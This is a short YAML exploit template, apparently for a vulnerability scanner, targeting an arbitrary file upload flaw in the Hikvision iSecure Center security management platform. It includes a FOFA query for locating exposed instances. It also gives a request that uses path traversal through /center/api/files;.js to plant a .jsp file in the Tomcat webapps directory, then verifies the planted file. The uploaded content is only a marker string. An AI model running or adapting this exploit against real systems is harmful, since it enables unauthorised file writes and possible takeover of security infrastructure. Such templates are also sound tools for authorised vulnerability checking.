product: 海康威视综合安防管理平台
vName: 海康威视综合安防管理平台 任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 海康威视isecure center 综合安防管理平台存在任意文件上传漏洞
version: ''
note: ''
search:
  FOFA: app="HIKVISION-综合安防管理平台" || app="HIKVISION-iSecure-Center"
protocol: http
link: https://blog.csdn.net/weixin_43981050/article/details/132734363
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /center/api/files;.js
      file:
        file:
          - ../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/52e039302a62d077.jsp
          - 95cc64dd2825f9df13ec4ad683ecf339
          - application/jpg
    verify:
      path: /clusterMgr/52e039302a62d077.jsp;.js
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and